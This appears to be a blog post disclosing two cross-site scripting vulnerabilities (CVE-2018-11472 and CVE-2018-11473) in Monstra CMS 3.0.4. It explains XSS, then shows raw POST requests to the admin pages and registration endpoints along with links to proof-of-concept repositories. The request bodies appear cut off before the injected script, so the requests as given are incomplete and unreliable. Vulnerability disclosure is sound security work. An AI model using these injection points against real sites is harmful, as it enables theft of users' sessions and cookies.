This article is about the XSS vulnerabilities that we had found on Monstra CMS 3.0.4. The bugs had a medium effect, and they were also easy to find and replicate.
Now let us talk about XSS.
Cross-Site Scripting (XSS) attacks are a form of scripting that injects malicious scripts into otherwise benign and trusted websites, according to the internet. XSS attacks occur when a web application is used by an attacker to send malicious code to a specific end user, typically in the form of a browser side script. Flaws that enable these attacks to succeed are widespread and occur wherever a web application uses a user’s input within the output it generates without validating or encoding it.
An attacker may use XSS to give an unsuspecting user a malicious script. The client or the end user has no way of knowing that the script should not be trusted and that the script will be executed. As he assumes that the script comes from a trusted source; any cookies, session tokens, or other sensitive information retained by the browser and used with that site can be accessed by the malicious script. Such scripts can also rewrite the HTML page text.I will give a detailed explanation on XSS in the coming days that will be placed on the articles tab.
CVE-2018-11472
Vulnerability Type : Cross Site Scripting (XSS)
Vendor of Product : Monstra CMS 3.0.4
Affected Component : http://localhost/monstra/admin/index.php?id=pages
Attack Type : Remote
Attack Vectors:
Steps:
POST REQUEST:-
POST /monstra/admin/index.php?id=pages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra/admin/index.php?id=pages
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
login


CVE-2018-11473
Vulnerability Type : Cross Site Scripting (XSS)
Vendor of Product : Monstra CMS 3.0.4
Affected Component : http://localhost/monstra/users/registration
Attack Type : Remote
Attack Vectors:
Steps:
POST REQUEST:-
POST /monstra/users/registration HTTP/1.1
Host: localhost
Cache-Control: no-cache
Referer: http://localhost/monstra/users/registration
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B
Accept-Encoding: gzip, deflate
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&login=”>
External Links:
CVE-2018-11472
https://github.com/nikhil1232/Monstra-CMS-3.0.4-Reflected-XSS-On-Login-
CVE-2018-11473
https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
That’s all for now. See you next time.
Discover complete cybersecurity expertise you can trust and prove you made the right choice!
